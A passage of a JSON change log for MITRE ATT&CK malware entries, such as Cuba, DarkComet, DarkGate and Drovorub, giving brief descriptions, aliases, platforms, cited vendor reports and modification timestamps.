"external_id": "S0538" + }, + { + "source_name": "ESET Crutch December 2020", + "description": "Faou, M. (2020, December 2). Turla Crutch: Keeping the \u201cback door\u201d open. Retrieved December 4, 2020.", + "url": "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Crutch" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:04.068000+00:00\", \"old_value\": \"2025-04-16 20:38:23.296000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-08-10 14:26:12.369000+00:00", + "modified": "2025-04-25 14:44:14.409000+00:00", + "name": "Cryptoistic", + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: SentinelOne Lazarus macOS July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0498", + "external_id": "S0498" + }, + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020.", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cryptoistic" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:14.409000+00:00\", \"old_value\": \"2025-04-16 20:38:27.529000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6cd07296-14aa-403d-9229-6343d03d4752", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-18 22:05:58.411000+00:00", + "modified": "2025-04-25 14:43:42.282000+00:00", + "name": "Cuba", + "description": "\n[Cuba](https://attack.mitre.org/software/S0625) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.(Citation: McAfee Cuba April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0625", + "external_id": "S0625" + }, + { + "source_name": "Cuba", + "description": "(Citation: McAfee Cuba April 2021)" + }, + { + "source_name": "McAfee Cuba April 2021", + "description": "Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cuba" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:42.282000+00:00\", \"old_value\": \"2025-04-16 20:38:15.861000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6de9cad1-eed2-4e27-b0b5-39fa29349ea0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-02 15:48:55.838000+00:00", + "modified": "2025-04-25 14:43:42.648000+00:00", + "name": "DEATHRANSOM", + "description": "[DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0616", + "external_id": "S0616" + }, + { + "source_name": "FireEye FiveHands April 2021", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DEATHRANSOM" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:42.648000+00:00\", \"old_value\": \"2025-04-16 20:38:16.017000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--53ab35c2-d00e-491a-8753-41d35ae7e547", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-29 19:18:28.468000+00:00", + "modified": "2025-04-25 14:43:20.605000+00:00", + "name": "DarkComet", + "description": "[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0334", + "external_id": "S0334" + }, + { + "source_name": "DarkComet", + "description": "(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "DarkKomet", + "description": "(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "Fynloski", + "description": "(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "Krademok", + "description": "(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "FYNLOS", + "description": "(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "TrendMicro DarkComet Sept 2014", + "description": "TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET" + }, + { + "source_name": "Malwarebytes DarkComet March 2018", + "description": "Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.", + "url": "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DarkComet", + "DarkKomet", + "Fynloski", + "Krademok", + "FYNLOS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:20.605000+00:00\", \"old_value\": \"2025-04-16 20:38:08.057000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6f6f67c9-556d-4459-95c2-78d272190e52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2024-02-09 19:52:30.428000+00:00", + "modified": "2025-04-22 22:18:48.564000+00:00", + "name": "DarkGate", + "description": "[DarkGate](https://attack.mitre.org/software/S1111) first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named \"DarkGate\" by its author, [DarkGate](https://attack.mitre.org/software/S1111) is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.(Citation: Ensilo Darkgate 2018) DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.(Citation: Trellix Darkgate 2023)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1111", + "external_id": "S1111" + }, + { + "source_name": "Ensilo Darkgate 2018", + "description": "Adi Zeligson & Rotem Kerner. (2018, November 13). Enter The DarkGate - New Cryptocurrency Mining and Ransomware Campaign. Retrieved February 9, 2024.", + "url": "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign" + }, + { + "source_name": "Trellix Darkgate 2023", + "description": "Ernesto Fern\u00e1ndez Provecho, Pham Duy Phuc, Ciana Driscoll & Vinoo Thomas. (2023, November 21). The Continued Evolution of the DarkGate Malware-as-a-Service. Retrieved February 9, 2024.", + "url": "https://www.trellix.com/blogs/research/the-continued-evolution-of-the-darkgate-malware-as-a-service/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DarkGate" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Serhii Melnyk, Trustwave SpiderLabs", + "Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 22:18:48.564000+00:00\", \"old_value\": \"2024-09-29 10:22:45.776000+00:00\"}, \"root['x_mitre_contributors'][1]\": {\"new_value\": \"Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd\", \"old_value\": \"Phyo Paing Htun (ChiLai)\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b6b3dfc7-9a81-43ff-ac04-698bad48973a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:29.509000+00:00", + "name": "Daserf", + "description": "[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0187", + "external_id": "S0187" + }, + { + "source_name": "Daserf", + "description": "(Citation: Trend Micro Daserf Nov 2017)" + }, + { + "source_name": "Muirim", + "description": "(Citation: Trend Micro Daserf Nov 2017)" + }, + { + "source_name": "Nioupale", + "description": "(Citation: Trend Micro Daserf Nov 2017)" + }, + { + "source_name": "Trend Micro Daserf Nov 2017", + "description": "Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER\u2019s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + }, + { + "source_name": "Secureworks BRONZE BUTLER Oct 2017", + "description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Daserf", + "Muirim", + "Nioupale" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:29.509000+00:00\", \"old_value\": \"2025-04-16 20:38:31.680000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--8f460983-1bbb-4e7e-8094-f0b5e720f658", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:02.087000+00:00", + "name": "DealersChoice", + "description": "[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0243", + "external_id": "S0243" + }, + { + "source_name": "DealersChoice", + "description": "(Citation: Sofacy DealersChoice)" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DealersChoice" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:02.087000+00:00\", \"old_value\": \"2025-04-16 20:38:22.471000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--e170995d-4f61-4f17-b60e-04f9a06ee517", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:44:54.842000+00:00", + "name": "Dipsind", + "description": "[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0200", + "external_id": "S0200" + }, + { + "source_name": "Dipsind", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Dipsind" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:54.842000+00:00\", \"old_value\": \"2025-04-16 20:38:39.512000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4f1c389e-a80e-4a3e-9b0e-9be8c91df64f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-06 15:53:34.722000+00:00", + "modified": "2025-04-25 14:43:17.148000+00:00", + "name": "Doki", + "description": "[Doki](https://attack.mitre.org/software/S0600) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://attack.mitre.org/software/S0600) was used in conjunction with the [ngrok](https://attack.mitre.org/software/S0508) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. (Citation: Intezer Doki July 20)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0600", + "external_id": "S0600" + }, + { + "source_name": "Intezer Doki July 20", + "description": "Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.", + "url": "https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Doki" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Containers" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:17.148000+00:00\", \"old_value\": \"2025-04-16 20:38:06.758000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:56.608000+00:00", + "name": "DownPaper", + "description": "[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0186", + "external_id": "S0186" + }, + { + "source_name": "DownPaper", + "description": "(Citation: ClearSky Charming Kitten Dec 2017)" + }, + { + "source_name": "ClearSky Charming Kitten Dec 2017", + "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DownPaper" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:56.608000+00:00\", \"old_value\": \"2025-04-16 20:38:40.332000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--08d20cd2-f084-45ee-8558-fa6ef5a18519", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:16.790000+00:00", + "modified": "2025-04-25 14:42:36.848000+00:00", + "name": "Downdelph", + "description": "[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0134", + "external_id": "S0134" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Downdelph", + "Delphacy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:36.848000+00:00\", \"old_value\": \"2025-04-16 20:37:53.960000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--3ae6097d-d700-46c6-8b21-42fc0bcb48fa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-22 18:36:12.214000+00:00", + "modified": "2025-04-25 14:43:03.619000+00:00", + "name": "DropBook", + "description": "[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0547", + "external_id": "S0547" + }, + { + "source_name": "DropBook", + "description": "(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)" + }, + { + "source_name": "Cybereason Molerats Dec 2020", + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" + }, + { + "source_name": "BleepingComputer Molerats Dec 2020", + "description": "Ilascu, I. (2020, December 14). Hacking group\u2019s new malware abuses Google and Facebook services. Retrieved December 28, 2020.", + "url": "https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DropBook" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:03.619000+00:00\", \"old_value\": \"2025-04-16 20:38:03.046000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-08-25 18:05:14.953000+00:00", + "modified": "2025-04-25 14:44:09.839000+00:00", + "name": "Drovorub", + "description": "[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0502", + "external_id": "S0502" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Drovorub" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:09.839000+00:00\", \"old_value\": \"2025-04-16 20:38:25.508000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:41.750000+00:00", + "modified": "2025-04-25 14:43:38.466000+00:00", + "name": "DustySky", + "description": "[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0062", + "external_id": "S0062" + }, + { + "source_name": "DustySky", + "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.", + "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf" + }, + { + "source_name": "DustySky2", + "description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.", + "url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf" + }, + { + "source_name": "Kaspersky MoleRATs April 2019", + "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.", + "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DustySky", + "NeD Worm" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:38.466000+00:00\", \"old_value\": \"2025-04-16 20:38:14.194000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:19.746000+00:00", + "modified": "2025-04-25 14:43:34.862000+00:00", + "name": "Dyre", + "description": "[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. \n (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0024", + "external_id": "S0024" + }, + { + "source_name": "Dyre", + "description": "(Citation: Symantec Dyre June 2015)" + }, + { + "source_name": "Dyzap", + "description": "(Citation: Sophos Dyreza April 2015)" + }, + { + "source_name": "Dyreza", + "description": "(Citation: Sophos Dyreza April 2015)" + }, + { + "source_name": "Symantec Dyre June 2015", + "description": "Symantec Security Response. (2015, June 23). 